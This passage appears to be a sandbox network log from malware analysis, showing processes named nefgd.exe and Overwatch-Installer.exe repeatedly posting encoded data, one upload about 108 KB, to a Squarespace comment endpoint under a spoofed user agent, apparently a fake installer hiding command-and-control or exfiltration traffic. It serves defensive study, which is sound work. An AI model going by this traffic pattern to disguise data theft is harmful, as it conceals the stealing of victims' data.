2024-09-01 20:04:57 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:57 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BciYq10WMHyEOTVhZjUzNDhmYWQxOWE3MTk3OWJmOTQwMjNiZjQ0; Path=/; Secure Set-Cookie: crumb=BZ8kz58VYDiWOGM1ODI0MjQzZWI3OWYwOTQ2ODVhNmMyMDE3Nzc2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: xfAMZlTx/Gr2fFUHo Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ8kz58VYDiWOGM1ODI0MjQzZWI3OWYwOTQ2ODVhNmMyMDE3Nzc2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	49841	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:57 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:57 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:57 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:57 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BW28nlcJw-U8YzM0Nzk3ZjdmNWQ4YzMyOTc0ODlhZTc5MzlhMmE0; Path=/; Secure Set-Cookie: crumb=BbaeFxl3E6aCNTlmZGEzNzQyNzkwNDcyNGJkMTBjYzk2NTg2Mjgx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2Aap3alI/eoLEVLbg Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbaeFxl3E6aCNTlmZGEzNzQyNzkwNDcyNGJkMTBjYzk2NTg2Mjgx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	49842	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:57 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 51 4b 74 75 62 78 64 37 67 77 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTQKtubxd7gwQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:57 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQyl-WkTt2vqMDJjNmUyZDBhNzQ4NzlhNzhhZDI5NGVmMDRlYmY3; Path=/; Secure Set-Cookie: crumb=BY9zRlXsEtv9YTUzNGQ1YmIyNzJhOTMzY2Y2MDkxOTJlZWMzZWMz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ncATGG3p/ICCkaH6g Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BY9zRlXsEtv9YTUzNGQ1YmIyNzJhOTMzY2Y2MDkxOTJlZWMzZWMz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	49843	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:57 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:58 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:57 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRpDeo6mVOfrMDlmYzZiZTA3NGQ2YzczZDc2NzFiOWEzY2ZmOTY3; Path=/; Secure Set-Cookie: crumb=BeQy-NZOmxBdMmNlZWY5Mjg3ODdmZmY0OTQ1NGVlOTQyY2RjMjky; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 4EzJTyMB/1mzDRTwF Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeQy-NZOmxBdMmNlZWY5Mjg3ODdmZmY0OTQ1NGVlOTQyY2RjMjky"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	49844	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:57 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:57 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:57 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYHAX2SI89AGNmJiNDkyODQyYjkzMzYyODg1ZjNhOTk4ODEzNjNk; Path=/; Secure Set-Cookie: crumb=BajMsq1vc2WrNWU5NjQzYzQ3ZGIyZDQ5ZDRmNmRmYTZjNTcxOWMx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 71NtCJto/zexuIx1m Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BajMsq1vc2WrNWU5NjQzYzQ3ZGIyZDQ5ZDRmNmRmYTZjNTcxOWMx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	49845	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:58 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:58 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:58 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXOfaWuCSXXpYmRkMzU5Yzc4NTFiYmQ5Mzg0NjU5Nzk2MDIxNWJk; Path=/; Secure Set-Cookie: crumb=BSwH4TpDTta1ODQ5NzBiNmY5MzUwOGM1OWY5NjkxMmVjNmRlMzFi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: dY3j9PTX/knAQKs77 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSwH4TpDTta1ODQ5NzBiNmY5MzUwOGM1OWY5NjkxMmVjNmRlMzFi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	49846	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:58 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:58 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:58 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWZFdoVMbp9mMTE4MDRkNmNhMmVmZDVkNzIxZTRiYzJlNjhlNmYx; Path=/; Secure Set-Cookie: crumb=BQKZcrNYI8sUZmQ0NTRkOWFmZjg5MzgyOTBhNzU2ZGRmYzllODhm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 0rC0ASHC/hidergwQ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQKZcrNYI8sUZmQ0NTRkOWFmZjg5MzgyOTBhNzU2ZGRmYzllODhm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	49847	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:58 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:58 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data 